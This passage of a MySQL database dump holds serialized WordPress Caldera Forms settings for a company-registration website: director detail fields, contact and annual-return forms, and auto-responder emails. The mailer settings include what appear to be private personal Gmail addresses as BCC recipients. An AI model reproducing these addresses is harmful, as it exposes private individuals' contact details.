0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_2783041\";a:7:{s:2:\"ID\";s:11:\"fld_2783041\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:11:\"Postal Code\";s:4:\"slug\";s:13:\"postal_code13\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_1942555713747647\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:11:\"Postal Code\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:6:\"masked\";i:1;s:4:\"mask\";i:9999;}}s:11:\"fld_8323347\";a:7:{s:2:\"ID\";s:11:\"fld_8323347\";s:4:\"type\";s:13:\"section_break\";s:5:\"label\";s:8:\"Section3\";s:4:\"slug\";s:8:\"section4\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:5:\"width\";s:0:\"\";}}s:11:\"fld_9217608\";a:7:{s:2:\"ID\";s:11:\"fld_9217608\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:10:\"dIrector 4\";s:4:\"slug\";s:11:\"_director_4\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:67:\"<h2><span style=\"color: #3366ff;\">4th Directors Details</span></h2>\";}}s:11:\"fld_6098585\";a:7:{s:2:\"ID\";s:11:\"fld_6098585\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Full Name\";s:4:\"slug\";s:10:\"full_name4\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_2034410\";a:7:{s:2:\"ID\";s:11:\"fld_2034410\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:5:\"Email\";s:4:\"slug\";s:6:\"email4\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";}}s:11:\"fld_6028157\";a:7:{s:2:\"ID\";s:11:\"fld_6028157\";s:4:\"type\";s:12:\"phone_better\";s:5:\"label\";s:11:\"Cell Number\";s:4:\"slug\";s:13:\"cell_number44\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";}}s:11:\"fld_7792983\";a:7:{s:2:\"ID\";s:11:\"fld_7792983\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:21:\"Physical Home Address\";s:4:\"slug\";s:22:\"physical_home_address4\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_7588887\";a:7:{s:2:\"ID\";s:11:\"fld_7588887\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:4:\"City\";s:4:\"slug\";s:5:\"city4\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_5382021\";a:7:{s:2:\"ID\";s:11:\"fld_5382021\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:6:\"Suburb\";s:4:\"slug\";s:7:\"suburb4\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_3709033\";a:7:{s:2:\"ID\";s:11:\"fld_3709033\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:11:\"Postal Code\";s:4:\"slug\";s:13:\"postal_code14\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:11:\"Postal Code\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:6:\"masked\";i:1;s:4:\"mask\";i:9999;}}s:11:\"fld_4901447\";a:7:{s:2:\"ID\";s:11:\"fld_4901447\";s:4:\"type\";s:13:\"section_break\";s:5:\"label\";s:9:\"Section 5\";s:4:\"slug\";s:9:\"section_5\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:5:\"width\";s:0:\"\";}}s:11:\"fld_7881401\";a:7:{s:2:\"ID\";s:11:\"fld_7881401\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:11:\"Almost Done\";s:4:\"slug\";s:11:\"almost_done\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:102:\"<h2><span style=\"font-family: trebuchet ms,geneva,sans-serif; color: #3366ff;\">Almost Done</span></h2>\";}}s:10:\"fld_734537\";a:8:{s:2:\"ID\";s:10:\"fld_734537\";s:4:\"type\";s:4:\"file\";s:5:\"label\";s:48:\"Upload certified copies of Director IDs/Passport\";s:4:\"slug\";s:47:\"upload_certified_copies_of_director_idspassport\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:142:\"If the upload files exceeds 2MB please email the file to store@companyregistration.online and use the 1st Director\'s full name as the subject.\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:6:\"attach\";i:1;s:12:\"multi_upload\";i:1;s:17:\"multi_upload_text\";s:6:\"Upload\";s:7:\"allowed\";s:0:\"\";}}s:10:\"fld_615114\";a:7:{s:2:\"ID\";s:10:\"fld_615114\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:7:\"Message\";s:4:\"slug\";s:7:\"message\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:167:\"<h2>Before you submit?</h2>\n<p>Review the details of your submission.\nPlease be patient, after you click submit the form it will take 20-30 seconds to upload </p>\n<hr>\";}}s:11:\"fld_6786328\";a:7:{s:2:\"ID\";s:11:\"fld_6786328\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:15:\"Click to submit\";s:4:\"slug\";s:15:\"click_to_submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:11:\"label_space\";i:1;s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:10:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:76:\"Website: Company Registration Form %incorporator_or_1st_directors_full_name%\";s:12:\"sender_email\";s:31:\"info@companyregistration.online\";s:8:\"reply_to\";s:0:\"\";s:10:\"email_type\";s:4:\"html\";s:8:\"csv_data\";i:1;s:10:\"recipients\";s:0:\"\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:25:\"Company Registration Form\";s:13:\"email_message\";s:9:\"{summary}\";}s:10:\"processors\";a:1:{s:11:\"fp_31133660\";a:5:{s:2:\"ID\";s:11:\"fp_31133660\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:6:{s:11:\"sender_name\";s:6:\"Zainub\";s:12:\"sender_email\";s:31:\"info@companyregistration.online\";s:7:\"subject\";s:31:\"Company registration submission\";s:14:\"recipient_name\";s:17:\"{user:first_name}\";s:15:\"recipient_email\";s:17:\"{user:user_email}\";s:7:\"message\";s:556:\"Hi %recipient_name%.\n\nThanks for your submission of information required to register your company\n%proposed_company_name%.\n\nPlease note that your company name has to be approved by the Companies and Intellectual Property Commission [CIPC] in order for the registration to proceed.  \n\nIf your submitted name is not approved we will contact you to provide alternatives.\n\nIf either of the name/s provided are approved the registration will continue.\n\nWe will then contact you once the company is registered.\n\nHave a great day.\n\nwww.companyregistration.online\n\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:3:\"use\";s:5:\"group\";a:1:{s:13:\"rw42556336953\";a:1:{s:13:\"cl10722462566\";a:3:{s:5:\"field\";s:0:\"\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:0:\"\";}}}}}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:4:{s:20:\"con_2805061499476255\";a:5:{s:2:\"id\";s:20:\"con_2805061499476255\";s:4:\"name\";s:21:\"Show Business Address\";s:4:\"type\";s:4:\"show\";s:6:\"fields\";a:1:{s:18:\"cl3878994114606396\";s:11:\"fld_2828361\";}s:5:\"group\";a:1:{s:18:\"rw8312698847209985\";a:1:{s:18:\"cl3878994114606396\";a:4:{s:6:\"parent\";s:18:\"rw8312698847209985\";s:5:\"field\";s:11:\"fld_2828361\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:10:\"opt2058635\";}}}}s:19:\"con_420314167051725\";a:5:{s:2:\"id\";s:19:\"con_420314167051725\";s:4:\"name\";s:11:\"Directors 3\";s:4:\"type\";s:4:\"hide\";s:6:\"fields\";a:3:{s:18:\"cl7938739829049254\";s:11:\"fld_9988349\";s:18:\"cl6193428651277406\";s:11:\"fld_9988349\";s:18:\"cl4549233610586182\";s:11:\"fld_9988349\";}s:5:\"group\";a:3:{s:18:\"rw1795461035268564\";a:1:{s:18:\"cl7938739829049254\";a:4:{s:6:\"parent\";s:18:\"rw1795461035268564\";s:5:\"field\";s:11:\"fld_9988349\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:9:\"opt928513\";}}s:17:\"rw127359080480711\";a:1:{s:18:\"cl6193428651277406\";a:4:{s:6:\"parent\";s:17:\"rw127359080480711\";s:5:\"field\";s:11:\"fld_9988349\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:10:\"opt1518591\";}}s:18:\"rw3911997978236381\";a:1:{s:18:\"cl4549233610586182\";a:4:{s:6:\"parent\";s:18:\"rw3911997978236381\";s:5:\"field\";s:11:\"fld_9988349\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:10:\"opt2755045\";}}}}s:20:\"con_1942555713747647\";a:5:{s:2:\"id\";s:20:\"con_1942555713747647\";s:4:\"name\";s:11:\"DIrectors 2\";s:4:\"type\";s:4:\"hide\";s:6:\"fields\";a:2:{s:17:\"cl703759481753604\";s:11:\"fld_9988349\";s:18:\"cl8564980934509177\";s:11:\"fld_9988349\";}s:5:\"group\";a:2:{s:18:\"rw7940431767921770\";a:1:{s:17:\"cl703759481753604\";a:4:{s:6:\"parent\";s:18:\"rw7940431767921770\";s:5:\"field\";s:11:\"fld_9988349\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:9:\"opt928513\";}}s:18:\"rw8695655637604996\";a:1:{s:18:\"cl8564980934509177\";a:4:{s:6:\"parent\";s:18:\"rw8695655637604996\";s:5:\"field\";s:11:\"fld_9988349\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:10:\"opt1518591\";}}}}s:20:\"con_9180242064820795\";a:5:{s:2:\"id\";s:20:\"con_9180242064820795\";s:4:\"name\";s:11:\"Directors 1\";s:4:\"type\";s:4:\"hide\";s:6:\"fields\";a:1:{s:18:\"cl1716097489132741\";s:11:\"fld_9988349\";}s:5:\"group\";a:1:{s:18:\"rw8723213517883387\";a:1:{s:18:\"cl1716097489132741\";a:4:{s:6:\"parent\";s:18:\"rw8723213517883387\";s:5:\"field\";s:11:\"fld_9988349\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:9:\"opt928513\";}}}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:7:\"version\";s:5:\"1.5.1\";}'),(4,'CF56f9709d16af8','primary','a:21:{s:13:\"_last_updated\";s:31:\"Sun, 10 Apr 2016 13:02:44 +0000\";s:2:\"ID\";s:15:\"CF56f9709d16af8\";s:10:\"cf_version\";s:7:\"1.3.4.2\";s:4:\"name\";s:10:\"Contact us\";s:11:\"description\";s:0:\"\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:7:\"success\";s:48:\"Form has been successfully submitted. Thank you.\";s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:6:{s:11:\"fld_8768091\";s:3:\"1:1\";s:11:\"fld_9970286\";s:3:\"1:2\";s:11:\"fld_6009157\";s:3:\"1:3\";s:11:\"fld_2758980\";s:3:\"2:1\";s:11:\"fld_7683514\";s:3:\"3:1\";s:11:\"fld_7908577\";s:3:\"4:1\";}s:9:\"structure\";s:14:\"4:4:4|12|12|12\";}s:6:\"fields\";a:6:{s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";}}s:11:\"fld_2758980\";a:7:{s:2:\"ID\";s:11:\"fld_2758980\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:7:\"message\";s:4:\"slug\";s:7:\"message\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:92:\"<h2>How can we help?</h2>\n<p>Feel free to ask a question or simply leave a comment.</p>\n<hr>\";}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:9:\"Send Form\";s:4:\"slug\";s:9:\"send_form\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:18:\"conditional_groups\";a:0:{}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:6:{s:11:\"sender_name\";s:10:\"Site Admin\";s:12:\"sender_email\";s:15:\"admin@localhost\";s:7:\"subject\";s:21:\"Contact auto-response\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:159:\"Hi %recipient_name%.\nThanks for your email.\nWe\'ll get get back to you as soon as possible!\nHere\'s a summary of your message:\n------------------------\n{summary}\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:6:\"mailer\";a:10:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:47:\"Website contact form companyregistration.online\";s:12:\"sender_email\";s:31:\"info@companyregistration.online\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:8:\"csv_data\";i:1;s:10:\"recipients\";s:0:\"\";s:6:\"bcc_to\";s:19:\"imraanmaw@gmail.com\";s:13:\"email_subject\";s:40:\"Contact us from %first_name% %last_name%\";s:13:\"email_message\";s:9:\"{summary}\";}s:7:\"version\";s:7:\"1.3.4.2\";}'),(5,'CF5714b9a9ee4ba','primary','a:20:{s:13:\"_last_updated\";s:31:\"Mon, 18 Apr 2016 11:08:22 +0000\";s:2:\"ID\";s:15:\"CF5714b9a9ee4ba\";s:10:\"cf_version\";s:7:\"1.3.4.2\";s:4:\"name\";s:18:\"Annual Return Form\";s:11:\"description\";s:43:\"For submission of annual return information\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:7:\"success\";s:48:\"Form has been successfully submitted. Thank you.\";s:12:\"avatar_field\";N;s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:11:\"fld_5001800\";s:3:\"1:1\";s:11:\"fld_5442186\";s:3:\"2:1\";s:11:\"fld_4734641\";s:3:\"3:1\";s:11:\"fld_4750442\";s:3:\"4:1\";s:11:\"fld_7437829\";s:3:\"5:1\";s:11:\"fld_6790916\";s:3:\"6:1\";s:11:\"fld_5578548\";s:3:\"7:1\";}s:9:\"structure\";s:20:\"12|12|12|12|12|12|12\";}s:6:\"fields\";a:7:{s:11:\"fld_5001800\";a:8:{s:2:\"ID\";s:11:\"fld_5001800\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Full Name\";s:4:\"slug\";s:9:\"full_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_5442186\";a:8:{s:2:\"ID\";s:11:\"fld_5442186\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";}}s:11:\"fld_4734641\";a:8:{s:2:\"ID\";s:11:\"fld_4734641\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:12:\"Company Name\";s:4:\"slug\";s:12:\"company_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_4750442\";a:8:{s:2:\"ID\";s:11:\"fld_4750442\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:27:\"Company Registration Number\";s:4:\"slug\";s:27:\"company_registration_number\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:14:\"1900/000000/00\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:14:\"1900/000000/00\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_7437829\";a:8:{s:2:\"ID\";s:11:\"fld_7437829\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:32:\"Turnover for the respective year\";s:4:\"slug\";s:32:\"turnover_for_the_respective_year\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:6:\"number\";}}s:11:\"fld_6790916\";a:7:{s:2:\"ID\";s:11:\"fld_6790916\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:36:\"Please review before clicking submit\";s:4:\"slug\";s:36:\"please_review_before_clicking_submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:164:\"<h2>Before you submit?</h2>\n<p>Review the details of your submission.\nPlease be patient, after you click submit the form will take 20-30 seconds to upload </p>\n<hr>\";}}s:11:\"fld_5578548\";a:7:{s:2:\"ID\";s:11:\"fld_5578548\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:6:\"Submit\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:11:\"label_space\";i:1;s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:18:\"conditional_groups\";a:1:{s:15:\"_open_condition\";s:0:\"\";}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:6:\"mailer\";a:10:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"info@companyregistration.online\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:8:\"csv_data\";i:1;s:10:\"recipients\";s:31:\"info@companyregistration.online\";s:6:\"bcc_to\";s:19:\"zainubmaw@gmail.com\";s:13:\"email_subject\";s:18:\"Annual Return Form\";s:13:\"email_message\";s:9:\"{summary}\";}s:7:\"version\";s:7:\"1.3.4.2\";}'),(6,'CF593d53e794a4c','primary','a:21:{s:13:\"_last_updated\";s:31:\"Sat, 17 Jun 2017 11:00:24 +0000\";s:2:\"ID\";s:15:\"CF593d53e794a4c\";s:10:\"cf_version\";s:5:\"1.5.1\";s:4:\"name\";s:34:\"Standard Company Registration Form\";s:10:\"scroll_top\";i:0;s:11:\"description\";s:14:\"														\";s:7:\"success\";s:54:\"Form has been successfully submitted. Thank you.						\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";N;s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:2:{s:11:\"fld_8931537\";s:3:\"1:1\";s:11:\"fld_6929219\";s:3:\"2:1\";}s:9:\"structure\";s:5:\"12|12\";}s:6:\"fields\";a:2:{s:11:\"fld_8931537\";a:8:{s:2:\"ID\";s:11:\"fld_8931537\";s:4:\"type\";s:11:\"date_picker\";s:5:\"label\";s:18:\"Insert Todays Date\";s:4:\"slug\";s:18:\"insert_todays_date\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:8:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"format\";s:10:\"yyyy-mm-dd\";s:9:\"autoclose\";i:1;s:10:\"start_view\";s:5:\"month\";s:10:\"start_date\";i:0;s:8:\"end_date\";s:0:\"\";s:8:\"language\";s:5:\"en-GB\";}}s:11:\"fld_6929219\";a:8:{s:2:\"ID\";s:11:\"fld_6929219\";s:4:\"type\";s:8:\"dropdown\";s:5:\"label\";s:41:\"How many directors will the company have?\";s:4:\"slug\";s:40:\"how_many_directors_will_the_company_have\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:30:\"Select the number of directors\";s:6:\"config\";a:12:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:14:\"default_option\";s:0:\"\";s:9:\"auto_type\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:9:\"post_type\";s:4:\"post\";s:11:\"value_field\";s:4:\"name\";s:11:\"orderby_tax\";s:5:\"count\";s:12:\"orderby_post\";s:2:\"ID\";s:5:\"order\";s:3:\"ASC\";s:7:\"default\";s:0:\"\";s:6:\"option\";a:4:{s:9:\"opt205872\";a:3:{s:10:\"calc_value\";s:3:\"One\";s:5:\"value\";s:3:\"One\";s:5:\"label\";s:3:\"One\";}s:10:\"opt1319999\";a:3:{s:10:\"calc_value\";s:3:\"Two\";s:5:\"value\";s:3:\"Two\";s:5:\"label\";s:3:\"Two\";}s:10:\"opt2187849\";a:3:{s:10:\"calc_value\";s:5:\"Three\";s:5:\"value\";s:5:\"Three\";s:5:\"label\";s:5:\"Three\";}s:10:\"opt3344595\";a:3:{s:10:\"calc_value\";s:4:\"Four\";s:5:\"value\";s:4:\"Four\";s:5:\"label\";s:4:\"Four\";}}}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"info@companyregistration.online\";s:8:\"reply_to\";s:0:\"\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:0:\"\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:34:\"Standard Company Registration Form\";s:13:\"email_message\";s:9:\"{summary}\";}s:18:\"conditional_groups\";a:0:{}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:7:\"version\";s:5:\"1.5.1\";}');
/*!40000 ALTER TABLE `wpxb_cf_forms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_cf_tracking`
--

DROP TABLE IF EXISTS `wpxb_cf_tracking`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_cf_tracking` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `process_id` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_cf_tracking`
--

LOCK TABLES `wpxb_cf_tracking` WRITE;
/*!40000 ALTER TABLE `wpxb_cf_tracking` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_cf_tracking` ENABLE KEYS */;
